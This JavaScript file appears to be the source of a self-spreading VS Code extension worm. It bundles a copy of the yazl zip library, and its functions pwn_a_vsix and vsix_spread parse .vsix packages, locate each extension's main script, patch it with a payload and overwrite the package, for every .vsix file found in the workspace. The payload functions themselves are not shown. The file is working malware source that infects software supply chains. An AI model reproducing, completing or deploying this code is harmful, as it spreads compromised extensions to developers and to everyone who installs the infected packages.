1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
|
/*
* nightmare nightmare nightmare
*
* vsix patcher!
*/
const eocd_sig = 0x6054b50;
const eocd_size_off = 12;
const eocd_start_off = 16;
const cdfh_comp_size_off = 20;
const cdfh_fn_len_off = 28;
const cdfh_lh_off = 42;
const cdfh_fn_off = 46;
const lh_fn_off = 30;
const lh_uncomp_size_off = 22;
const buffer_allocunsafe = Buffer.allocUnsafe;
//YAZL
function prepareBuffer(buffer) {
buffer.w6 = buffer.writeUInt16LE;
buffer.w2 = buffer.writeUInt32LE;
buffer.r8 = buffer.readUInt8;
buffer.w8 = buffer.writeUInt8;
buffer.r6 = buffer.readUInt16LE;
buffer.r2 = buffer.readUInt32LE;
return buffer;
}
util.inherits(ZipFile, EventEmitter);
function ZipFile() {
this.outputStream = new PassThrough();
this.entries = [];
this.outputStreamCursor = 0;
this.ended = false; // .end() sets this
this.allDone = false; // set when we've written the last bytes
};
ZipFile.prototype.addBuffer = function(buffer, metadataPath) {
var self = this;
var entry = new Entry(metadataPath, false);
entry.uncompressedSize = buffer.length;
entry.crc32 = zlib["crc32"](buffer);
entry.crcAndFileSizeKnown = true;
self.entries.push(entry);
zlib.deflateRaw(buffer, {level:6}, function(err, compressedBuffer) {
setCompressedBuffer(compressedBuffer);
});
function setCompressedBuffer(compressedBuffer) {
entry.compressedSize = compressedBuffer.length;
entry.setFileDataPumpFunction(function() {
writeToOutputStream(self, compressedBuffer);
writeToOutputStream(self, entry.getDataDescriptor());
entry.state = Entry.FILE_DATA_DONE;
// don't call pumpEntries() recursively.
// (also, don't call process.nextTick recursively.)
setImmediate(function() {
pumpEntries(self);
});
});
pumpEntries(self);
}
};
ZipFile.prototype.end = function() {
if (this.ended) return;
this.ended = true;
this.comment = EMPTY_BUFFER;
pumpEntries(this);
};
function writeToOutputStream(self, buffer) {
self.outputStream.write(buffer);
self.outputStreamCursor += buffer.length;
}
function pumpEntries(self) {
if (self.allDone) return;
// pump entries
var entry = getFirstNotDoneEntry();
function getFirstNotDoneEntry() {
for (var i = 0; i < self.entries.length; i++) {
var entry = self.entries[i];
if (entry.state < Entry.FILE_DATA_DONE) return entry;
}
return null;
}
if (entry != null) {
// this entry is not done yet
if (entry.state < Entry.READY_TO_PUMP_FILE_DATA) return; // input file not open yet
if (entry.state === Entry.FILE_DATA_IN_PROGRESS) return; // we'll get there
// start with local file header
entry.relativeOffsetOfLocalHeader = self.outputStreamCursor;
var localFileHeader = entry.getLocalFileHeader();
writeToOutputStream(self, localFileHeader);
entry.doFileDataPump();
} else {
// all cought up on writing entries
if (self.ended) {
// head for the exit
self.offsetOfStartOfCentralDirectory = self.outputStreamCursor;
self.entries.forEach(function(entry) {
var centralDirectoryRecord = entry.getCentralDirectoryRecord();
writeToOutputStream(self, centralDirectoryRecord);
});
writeToOutputStream(self, getEndOfCentralDirectoryRecord(self));
self.outputStream.end();
self.allDone = true;
}
}
}
var ZIP64_END_OF_CENTRAL_DIRECTORY_RECORD_SIZE = 56;
var ZIP64_END_OF_CENTRAL_DIRECTORY_LOCATOR_SIZE = 20;
var END_OF_CENTRAL_DIRECTORY_RECORD_SIZE = 22;
function getEndOfCentralDirectoryRecord(self) {
var needZip64Format = false;
var normalEntriesLength = self.entries.length;
if (self.entries.length >= 0xffff) {
normalEntriesLength = 0xffff;
needZip64Format = true;
}
var sizeOfCentralDirectory = self.outputStreamCursor - self.offsetOfStartOfCentralDirectory;
var normalSizeOfCentralDirectory = sizeOfCentralDirectory;
var normalOffsetOfStartOfCentralDirectory = self.offsetOfStartOfCentralDirectory;
var eocdrBuffer = prepareBuffer(buffer_allocunsafe(END_OF_CENTRAL_DIRECTORY_RECORD_SIZE + self.comment.length));
// end of central dir signature 4 bytes (0x06054b50)
eocdrBuffer.w2(0x06054b50, 0);
// number of this disk 2 bytes
eocdrBuffer.w6(0, 4);
// number of the disk with the start of the central directory 2 bytes
eocdrBuffer.w6(0, 6);
// total number of entries in the central directory on this disk 2 bytes
eocdrBuffer.w6(normalEntriesLength, 8);
// total number of entries in the central directory 2 bytes
eocdrBuffer.w6(normalEntriesLength, 10);
// size of the central directory 4 bytes
eocdrBuffer.w2(normalSizeOfCentralDirectory, 12);
// offset of start of central directory with respect to the starting disk number 4 bytes
eocdrBuffer.w2(normalOffsetOfStartOfCentralDirectory, 16);
// .ZIP file comment (variable size)
self.comment.copy(eocdrBuffer, 22);
if (!needZip64Format) return eocdrBuffer;
// ZIP64 format
// ZIP64 End of Central Directory Record
var zip64EocdrBuffer = prepareBuffer(buffer_allocunsafe(ZIP64_END_OF_CENTRAL_DIRECTORY_RECORD_SIZE));
// zip64 end of central dir signature 4 bytes (0x06064b50)
zip64EocdrBuffer.w2(0x06064b50, 0);
// size of zip64 end of central directory record 8 bytes
writeUInt64LE(zip64EocdrBuffer, ZIP64_END_OF_CENTRAL_DIRECTORY_RECORD_SIZE - 12, 4);
// version made by 2 bytes
zip64EocdrBuffer.w6(VERSION_MADE_BY, 12);
// version needed to extract 2 bytes
zip64EocdrBuffer.w6(VERSION_NEEDED_TO_EXTRACT_ZIP64, 14);
// number of this disk 4 bytes
zip64EocdrBuffer.w2(0, 16);
// number of the disk with the start of the central directory 4 bytes
zip64EocdrBuffer.w2(0, 20);
// total number of entries in the central directory on this disk 8 bytes
writeUInt64LE(zip64EocdrBuffer, self.entries.length, 24);
// total number of entries in the central directory 8 bytes
writeUInt64LE(zip64EocdrBuffer, self.entries.length, 32);
// size of the central directory 8 bytes
writeUInt64LE(zip64EocdrBuffer, sizeOfCentralDirectory, 40);
// offset of start of central directory with respect to the starting disk number 8 bytes
writeUInt64LE(zip64EocdrBuffer, self.offsetOfStartOfCentralDirectory, 48);
// zip64 extensible data sector (variable size)
// nothing in the zip64 extensible data sector
// ZIP64 End of Central Directory Locator
var zip64EocdlBuffer = prepareBuffer(buffer_allocunsafe(ZIP64_END_OF_CENTRAL_DIRECTORY_LOCATOR_SIZE));
// zip64 end of central dir locator signature 4 bytes (0x07064b50)
zip64EocdlBuffer.w2(0x07064b50, 0);
// number of the disk with the start of the zip64 end of central directory 4 bytes
zip64EocdlBuffer.w2(0, 4);
// relative offset of the zip64 end of central directory record 8 bytes
writeUInt64LE(zip64EocdlBuffer, self.outputStreamCursor, 8);
// total number of disks 4 bytes
zip64EocdlBuffer.w2(1, 16);
return Buffer.concat([
zip64EocdrBuffer,
zip64EocdlBuffer,
eocdrBuffer,
]);
}
var EMPTY_BUFFER = prepareBuffer(buffer_allocunsafe(0));
// this class is not part of the public API
function Entry(metadataPath, isDirectory) {
this.utf8FileName = Buffer.from(metadataPath);
this.isDirectory = isDirectory;
this.state = Entry.WAITING_FOR_METADATA;
this.setFileAttributesMode(isDirectory ? 0o40775 : 0o100777);
if (isDirectory) {
this.crcAndFileSizeKnown = true;
this.crc32 = 0;
this.uncompressedSize = 0;
this.compressedSize = 0;
} else {
// unknown so far
this.crcAndFileSizeKnown = false;
this.crc32 = null;
this.uncompressedSize = null;
this.compressedSize = null;
}
this.compressionLevel = this.isDirectory ? 0 : 6;
// no comment.
this.fileComment = EMPTY_BUFFER;
}
Entry.WAITING_FOR_METADATA = 0;
Entry.READY_TO_PUMP_FILE_DATA = 1;
Entry.FILE_DATA_IN_PROGRESS = 2;
Entry.FILE_DATA_DONE = 3;
Entry.prototype.setFileAttributesMode = function(mode) {
// http://unix.stackexchange.com/questions/14705/the-zip-formats-external-file-attribute/14727#14727
this.externalFileAttributes = (mode << 16) >>> 0;
};
// doFileDataPump() should not call pumpEntries() directly. see issue #9.
Entry.prototype.setFileDataPumpFunction = function(doFileDataPump) {
this.doFileDataPump = doFileDataPump;
this.state = Entry.READY_TO_PUMP_FILE_DATA;
};
Entry.prototype.useZip64Format = () => {return this.forceZip64Format};
var LOCAL_FILE_HEADER_FIXED_SIZE = 30;
var VERSION_NEEDED_TO_EXTRACT_UTF8 = 20;
var VERSION_NEEDED_TO_EXTRACT_ZIP64 = 45;
// 3 = unix. 63 = spec version 6.3
var VERSION_MADE_BY = (3 << 8) | 63;
var FILE_NAME_IS_UTF8 = 1 << 11;
var UNKNOWN_CRC32_AND_FILE_SIZES = 1 << 3;
Entry.prototype.getLocalFileHeader = function() {
var crc32 = 0;
var compressedSize = 0;
var uncompressedSize = 0;
if (this.crcAndFileSizeKnown) {
crc32 = this.crc32;
compressedSize = this.compressedSize;
uncompressedSize = this.uncompressedSize;
}
var fixedSizeStuff = prepareBuffer(buffer_allocunsafe(LOCAL_FILE_HEADER_FIXED_SIZE));
var generalPurposeBitFlag = FILE_NAME_IS_UTF8;
if (!this.crcAndFileSizeKnown) generalPurposeBitFlag |= UNKNOWN_CRC32_AND_FILE_SIZES;
// local file header signature 4 bytes (0x04034b50)
fixedSizeStuff.w2(0x04034b50, 0);
// version needed to extract 2 bytes
fixedSizeStuff.w6(VERSION_NEEDED_TO_EXTRACT_UTF8, 4);
// general purpose bit flag 2 bytes
fixedSizeStuff.w6(generalPurposeBitFlag, 6);
// compression method 2 bytes
fixedSizeStuff.w6(this.isDirectory?0:8, 8);
// crc-32 4 bytes
fixedSizeStuff.w2(crc32, 14);
// compressed size 4 bytes
fixedSizeStuff.w2(compressedSize, 18);
// uncompressed size 4 bytes
fixedSizeStuff.w2(uncompressedSize, 22);
// file name length 2 bytes
fixedSizeStuff.w6(this.utf8FileName.length, 26);
// extra field length 2 bytes
fixedSizeStuff.w6(0, 28);
return Buffer.concat([
fixedSizeStuff,
// file name (variable size)
this.utf8FileName,
// extra field (variable size)
// no extra fields
]);
};
var DATA_DESCRIPTOR_SIZE = 16;
var ZIP64_DATA_DESCRIPTOR_SIZE = 24;
Entry.prototype.getDataDescriptor = function() {
if (this.crcAndFileSizeKnown) {
// the Mac Archive Utility requires this not be present unless we set general purpose bit 3
return EMPTY_BUFFER;
}
if (!this.useZip64Format()) {
var buffer = prepareBuffer(buffer_allocunsafe(DATA_DESCRIPTOR_SIZE));
// optional signature (required according to Archive Utility)
buffer.w2(0x08074b50, 0);
// crc-32 4 bytes
buffer.w2(this.crc32, 4);
// compressed size 4 bytes
buffer.w2(this.compressedSize, 8);
// uncompressed size 4 bytes
buffer.w2(this.uncompressedSize, 12);
return buffer;
} else {
// ZIP64 format
var buffer = prepareBuffer(buffer_allocunsafe(ZIP64_DATA_DESCRIPTOR_SIZE));
// optional signature (unknown if anyone cares about this)
buffer.w2(0x08074b50, 0);
// crc-32 4 bytes
buffer.w2(this.crc32, 4);
// compressed size 8 bytes
writeUInt64LE(buffer, this.compressedSize, 8);
// uncompressed size 8 bytes
writeUInt64LE(buffer, this.uncompressedSize, 16);
return buffer;
}
};
var CENTRAL_DIRECTORY_RECORD_FIXED_SIZE = 46;
var ZIP64_EXTENDED_INFORMATION_EXTRA_FIELD_SIZE = 28;
Entry.prototype.getCentralDirectoryRecord = function() {
var fixedSizeStuff = prepareBuffer(buffer_allocunsafe(CENTRAL_DIRECTORY_RECORD_FIXED_SIZE));
var generalPurposeBitFlag = FILE_NAME_IS_UTF8;
if (!this.crcAndFileSizeKnown) generalPurposeBitFlag |= UNKNOWN_CRC32_AND_FILE_SIZES;
var normalCompressedSize = this.compressedSize;
var normalUncompressedSize = this.uncompressedSize;
var normalRelativeOffsetOfLocalHeader = this.relativeOffsetOfLocalHeader;
var versionNeededToExtract = VERSION_NEEDED_TO_EXTRACT_UTF8;
var zeiefBuffer = EMPTY_BUFFER;
if (this.useZip64Format()) {
normalCompressedSize = 0xffffffff;
normalUncompressedSize = 0xffffffff;
normalRelativeOffsetOfLocalHeader = 0xffffffff;
versionNeededToExtract = VERSION_NEEDED_TO_EXTRACT_ZIP64;
// ZIP64 extended information extra field
zeiefBuffer = prepareBuffer(buffer_allocunsafe(ZIP64_EXTENDED_INFORMATION_EXTRA_FIELD_SIZE));
// 0x0001 2 bytes Tag for this "extra" block type
zeiefBuffer.w6(0x0001, 0);
// Size 2 bytes Size of this "extra" block
zeiefBuffer.w6(ZIP64_EXTENDED_INFORMATION_EXTRA_FIELD_SIZE - 4, 2);
// Original Size 8 bytes Original uncompressed file size
writeUInt64LE(zeiefBuffer, this.uncompressedSize, 4);
// Compressed Size 8 bytes Size of compressed data
writeUInt64LE(zeiefBuffer, this.compressedSize, 12);
// Relative Header Offset 8 bytes Offset of local header record
writeUInt64LE(zeiefBuffer, this.relativeOffsetOfLocalHeader, 20);
// Disk Start Number 4 bytes Number of the disk on which this file starts
// (omit)
}
// central file header signature 4 bytes (0x02014b50)
fixedSizeStuff.w2(0x02014b50, 0);
// version made by 2 bytes
fixedSizeStuff.w6(VERSION_MADE_BY, 4);
// version needed to extract 2 bytes
fixedSizeStuff.w6(versionNeededToExtract, 6);
// general purpose bit flag 2 bytes
fixedSizeStuff.w6(generalPurposeBitFlag, 8);
// compression method 2 bytes
fixedSizeStuff.w6(this.isDirectory?0:8, 10);
// crc-32 4 bytes
fixedSizeStuff.w2(this.crc32, 16);
// compressed size 4 bytes
fixedSizeStuff.w2(normalCompressedSize, 20);
// uncompressed size 4 bytes
fixedSizeStuff.w2(normalUncompressedSize, 24);
// file name length 2 bytes
fixedSizeStuff.w6(this.utf8FileName.length, 28);
// file comment length 2 bytes
fixedSizeStuff.w6(this.fileComment.length, 32);
// disk number start 2 bytes
fixedSizeStuff.w6(0, 34);
// internal file attributes 2 bytes
fixedSizeStuff.w6(0, 36);
// external file attributes 4 bytes
fixedSizeStuff.w2(this.externalFileAttributes, 38);
// relative offset of local header 4 bytes
fixedSizeStuff.w2(normalRelativeOffsetOfLocalHeader, 42);
return Buffer.concat([
fixedSizeStuff,
// file name (variable size)
this.utf8FileName,
zeiefBuffer,
// file comment (variable size)
this.fileComment,
]);
};
function writeUInt64LE(buffer, n, offset) {
// can't use bitshift here, because JavaScript only allows bitshifting on 32-bit integers.
var high = Math.floor(n / 0x100000000);
var low = n >>> 0;
buffer.w2(low, offset);
buffer.w2(high, offset + 4);
}
//ENDYAZL
function pwn_a_vsix(fname) {
let zip = prepareBuffer(fs.readFileSync(fname));
let pwnage = sentinel_pwn();
let l = zip.length;
let eocd_off = l - 22;
let eocd = zip.r2(eocd_off);
while (eocd != eocd_sig) {
eocd_off--;
eocd = zip.r2(eocd_off);
}
let cdfh_size = zip.r2(eocd_off + eocd_size_off);
let cdfh_start = zip.r2(eocd_off + eocd_start_off);
let cdfh = cdfh_start;
let pack_json;
let pack_off;
// let ext_manif_off;
let main;
let cdfh_fn_len;
let z = new ZipFile();
let ts = 0;
while (cdfh < cdfh_start + cdfh_size) {
cdfh_fn_len = zip.r2(cdfh + cdfh_fn_len_off);
let cdfh_fn = zip.slice(cdfh + cdfh_fn_off, cdfh + cdfh_fn_off + cdfh_fn_len).toString();
let lh_loc = zip.r2(cdfh + cdfh_lh_off);
let lh_comp_size = zip.r2(cdfh + cdfh_comp_size_off);
let lh_uncomp_size = zip.r2(lh_loc + lh_uncomp_size_off);
let wdeflate = (zip.r8(cdfh + 9) & 8) == 8;
let wpatch;
if (wdeflate) {
wpatch = zlib.inflateRawSync(zip.slice(lh_loc + lh_fn_off + cdfh_fn_len, lh_loc + lh_fn_off + cdfh_fn_len + lh_comp_size));
} else {
wpatch = zip.slice(lh_loc + lh_fn_off + cdfh_fn_len, lh_loc + lh_fn_off + cdfh_fn_len + lh_uncomp_size);
}
if (cdfh_fn == "extension.vsixmanifest") {
// ext_manif_off = lh_loc;
let ext_manif = wpatch;
pack_json = ext_manif.toString().match(/Manifest" Path="(.*?)"/)[1];
}
if (cdfh_fn == pack_json) {
pack_off = lh_loc;
let pack = wpatch;
pack = JSON.parse(pack);
main = path.normalize(path.dirname(pack_json) + "/" + pack["main"]);
//console.log(main)
}
if (cdfh_fn == main) {
//console.log("found it!");
wpatch = pwn_ext_buf(wpatch);
if (!wpatch) return;
}
ts += wpatch.length;
z.addBuffer(wpatch, cdfh_fn);
cdfh += cdfh_fn_len + cdfh_fn_off;
}
z.outputStream.pipe(fs.createWriteStream(fname)).on("close", () => {
//console.log("pwnd?");
});
z.end();
}
// XXX find an efficient method to find vsixs outside of workspaces
function vsix_spread() {
vscode["workspace"]["findFiles"]("**/{*.vsix}", "**/node_modules/**")["then"]((ev) => {
for (var el of ev) {
pwn_a_vsix(el.path);
}
});
}
|
